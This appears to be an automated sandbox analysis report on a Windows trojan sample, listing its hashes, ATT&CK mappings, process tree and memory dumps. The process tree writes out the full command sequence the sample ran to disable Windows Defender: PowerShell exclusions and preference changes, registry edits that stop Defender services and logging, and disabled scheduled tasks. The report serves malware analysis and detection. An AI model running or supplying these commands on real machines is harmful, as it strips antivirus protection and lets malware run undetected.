c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8

Analysis

max time kernel
119s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19/03/2024, 02:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
Size

91KB
MD5

607acc5a6b670bd144bf3897cda6b233
SHA1

24a2fc93216adb3543ee555473b2f61f333384d2
SHA256

c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8
SHA512

75bd3c2fe2a6b96586e0e1ecf5d282d55f71fb9891961ca1dd6c6be90eaa9a196fd62c8343abfdb039e384895a593f2a01c725451c580980f238c40d764b4643
SSDEEP

1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfLx4fmSxL2MO2:nq6+ouCpk2mpcWJ0r+QNTBfLyfmSBR

Score

10^/10

evasion trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x0007000000016412-1.dat	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2160	powershell.exe
2508	powershell.exe
2344	powershell.exe
2932	powershell.exe
748	powershell.exe
2184	powershell.exe
1288	powershell.exe
2500	powershell.exe
2992	powershell.exe
1708	powershell.exe
1780	powershell.exe
1988	powershell.exe
1964	powershell.exe
588	powershell.exe
1716	powershell.exe
832	powershell.exe
2564	powershell.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1964	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	832	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 2368	2188	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	28
PID 2188 wrote to memory of 2368	2188	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	28
PID 2188 wrote to memory of 2368	2188	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	28
PID 2188 wrote to memory of 2368	2188	c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe	28
PID 2368 wrote to memory of 2160	2368	cmd.exe	30
PID 2368 wrote to memory of 2160	2368	cmd.exe	30
PID 2368 wrote to memory of 2160	2368	cmd.exe	30
PID 2368 wrote to memory of 2508	2368	cmd.exe	31
PID 2368 wrote to memory of 2508	2368	cmd.exe	31
PID 2368 wrote to memory of 2508	2368	cmd.exe	31
PID 2368 wrote to memory of 2344	2368	cmd.exe	32
PID 2368 wrote to memory of 2344	2368	cmd.exe	32
PID 2368 wrote to memory of 2344	2368	cmd.exe	32
PID 2368 wrote to memory of 2932	2368	cmd.exe	33
PID 2368 wrote to memory of 2932	2368	cmd.exe	33
PID 2368 wrote to memory of 2932	2368	cmd.exe	33
PID 2368 wrote to memory of 748	2368	cmd.exe	34
PID 2368 wrote to memory of 748	2368	cmd.exe	34
PID 2368 wrote to memory of 748	2368	cmd.exe	34
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2724	2368	cmd.exe	35
PID 2368 wrote to memory of 2768	2368	cmd.exe	36
PID 2368 wrote to memory of 2768	2368	cmd.exe	36
PID 2368 wrote to memory of 2768	2368	cmd.exe	36
PID 2368 wrote to memory of 2772	2368	cmd.exe	37
PID 2368 wrote to memory of 2772	2368	cmd.exe	37
PID 2368 wrote to memory of 2772	2368	cmd.exe	37
PID 2368 wrote to memory of 2712	2368	cmd.exe	38
PID 2368 wrote to memory of 2712	2368	cmd.exe	38
PID 2368 wrote to memory of 2712	2368	cmd.exe	38
PID 2368 wrote to memory of 2760	2368	cmd.exe	39
PID 2368 wrote to memory of 2760	2368	cmd.exe	39
PID 2368 wrote to memory of 2760	2368	cmd.exe	39
PID 2368 wrote to memory of 1632	2368	cmd.exe	40
PID 2368 wrote to memory of 1632	2368	cmd.exe	40
PID 2368 wrote to memory of 1632	2368	cmd.exe	40
PID 2368 wrote to memory of 2176	2368	cmd.exe	41
PID 2368 wrote to memory of 2176	2368	cmd.exe	41
PID 2368 wrote to memory of 2176	2368	cmd.exe	41
PID 2368 wrote to memory of 1544	2368	cmd.exe	42
PID 2368 wrote to memory of 1544	2368	cmd.exe	42
PID 2368 wrote to memory of 1544	2368	cmd.exe	42
PID 2368 wrote to memory of 2784	2368	cmd.exe	43
PID 2368 wrote to memory of 2784	2368	cmd.exe	43
PID 2368 wrote to memory of 2784	2368	cmd.exe	43
PID 2368 wrote to memory of 2376	2368	cmd.exe	44
PID 2368 wrote to memory of 2376	2368	cmd.exe	44
PID 2368 wrote to memory of 2376	2368	cmd.exe	44
PID 2368 wrote to memory of 620	2368	cmd.exe	45
PID 2368 wrote to memory of 620	2368	cmd.exe	45
PID 2368 wrote to memory of 620	2368	cmd.exe	45
PID 2368 wrote to memory of 1756	2368	cmd.exe	46
PID 2368 wrote to memory of 1756	2368	cmd.exe	46
PID 2368 wrote to memory of 1756	2368	cmd.exe	46
PID 2368 wrote to memory of 1808	2368	cmd.exe	47
PID 2368 wrote to memory of 1808	2368	cmd.exe	47
PID 2368 wrote to memory of 1808	2368	cmd.exe	47
PID 2368 wrote to memory of 1096	2368	cmd.exe	48
PID 2368 wrote to memory of 1096	2368	cmd.exe	48
PID 2368 wrote to memory of 1096	2368	cmd.exe	48
PID 2368 wrote to memory of 784	2368	cmd.exe	49
PID 2368 wrote to memory of 784	2368	cmd.exe	49
PID 2368 wrote to memory of 784	2368	cmd.exe	49

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe
"C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6123.tmp\6124.tmp\6125.bat C:\Users\Admin\AppData\Local\Temp\c06da1d7ce6843074ae3a964dc8aa862151f2196c0e15964d3d9959a44ba89f8.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:748
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:2724
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:2768
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:2772
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:2712
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2760
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1632
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2176
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:1544
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2784
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:2376
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:620
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:1756
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1808
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1096
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:784
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:980
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1536
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1952
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:1240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:2444
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:2480
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:2568
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2632
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:2476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6123.tmp\6124.tmp\6125.bat

Filesize
3KB

MD5
ad8b6610172ff7b78c52f9ca37f38087

SHA1
9e672aa0385998b41de0eaee280af9372f3b299c

SHA256
582e18cb3c8b2c06080cbb7df73ef27128654a4f201476f457a787cae6b068a4

SHA512
2dd57fab8f54736dfe975b7c5c83de1c864e1f3fe498045f566f58da059be311ca8194c6634df447fbcec9382e3b67c70cc9fbc6a29076accdbcc1c0de829658

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XLMVB888Q2W0O8MROR2K.temp

Filesize
7KB

MD5
278bc18e56ca596317b928641e7e0de0

SHA1
f07147617d84fb443803b330b265ca40c802f200

SHA256
494379f6ed5880bbd7f4e3dc0191c1812ce219cdec0442e28c803de0ecee2204

SHA512
67d9e44ad7f039e22c75c6e4f382885be609625b6005f454dc4fa136e0ca270e38a7b9c803c9b80943595d1d76f63d8a1360e9f540a5a909382f8a98b1e4f09a

Download Submit
memory/748-61-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/748-62-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/748-59-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/748-60-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/748-58-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/748-64-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/748-63-0x00000000029B0000-0x0000000002A30000-memory.dmp

Filesize
512KB

Download
memory/1288-87-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/1288-83-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/1288-88-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/1288-84-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/1288-85-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/1288-86-0x00000000028A0000-0x0000000002920000-memory.dmp

Filesize
512KB

Download
memory/2160-8-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/2160-7-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/2160-10-0x00000000026D0000-0x00000000026D8000-memory.dmp

Filesize
32KB

Download
memory/2160-6-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-13-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-12-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/2160-11-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2160-9-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/2184-74-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2184-76-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2184-77-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2184-75-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2184-71-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2184-72-0x0000000002A00000-0x0000000002A80000-memory.dmp

Filesize
512KB

Download
memory/2184-73-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2344-36-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2344-40-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2344-39-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2344-38-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2344-37-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2344-35-0x00000000027A0000-0x0000000002820000-memory.dmp

Filesize
512KB

Download
memory/2344-34-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2500-94-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2500-95-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2500-96-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2500-97-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2500-98-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2500-99-0x0000000002960000-0x00000000029E0000-memory.dmp

Filesize
512KB

Download
memory/2500-100-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-25-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-26-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2508-20-0x000000001B380000-0x000000001B662000-memory.dmp

Filesize
2.9MB

Download
memory/2508-19-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2508-22-0x0000000001EA0000-0x0000000001EA8000-memory.dmp

Filesize
32KB

Download
memory/2508-21-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2508-24-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2508-23-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2508-27-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2932-47-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2932-46-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2932-52-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2932-49-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2932-48-0x000007FEF4C10000-0x000007FEF55AD000-memory.dmp

Filesize
9.6MB

Download
memory/2932-50-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2932-51-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2992-107-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-108-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2992-109-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2992-110-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-111-0x0000000002480000-0x0000000002500000-memory.dmp

Filesize
512KB

Download
memory/2992-112-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp

Filesize
9.6MB

Download